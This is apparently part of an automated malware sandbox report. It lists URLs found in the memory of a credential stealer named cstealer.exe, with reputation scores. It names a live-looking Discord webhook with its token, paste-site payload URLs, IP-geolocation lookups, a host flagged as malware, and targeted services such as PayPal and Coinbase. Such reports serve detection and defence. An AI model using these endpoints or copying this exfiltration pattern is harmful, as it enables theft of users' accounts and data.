                                              https://disney.com)z$cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://rentry.co/5uu99/rawzyhttps://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63Ucstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 4%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://riotgames.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://discord.com/api/v9/users/cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://xbox.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://youtube.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://twitch.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://peps.python.org/pep-0205/cstealer.exe, 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://curl.haxx.se/rfc/cookie_spec.htmlcstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177844870.00000271DA4D6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDevxExecutor.exe, 00000000.00000002.2179647836.00000000051E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://checkip.amazonaws.comzcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://json.orgcstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286765281.000002010308C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280491817.00000201030B6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284549098.000002010308B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://superfurrycdn.nl/copy/cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • 10%, Virustotal, Browse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxycstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688cstealer.exe, 00000003.00000002.2607686027.00000271D99E8000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB838000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://httpbin.org/getcstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2354769471.0000020103163000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289505736.0000020102E05000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272760282.0000020102C7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2333684327.0000020102DC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274816378.0000020102DA7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290506090.0000020102CB7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DA7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.000002010315F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DBC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284047329.0000020102C94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://amazon.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://crunchyroll.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://gmail.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://paypal.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://uber.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://coinbase.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://rentry.co/u4tup/rawcstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • 8%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://geolocation-db.com/jsonp/zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ebay.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		low
                                                                https://httpbin.org/cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://roblox.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlcstealer.exe, 00000003.00000003.2173619159.00000271DA3A1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173619159.00000271DA3F0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212896954.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.0000020103051000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.00000201030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
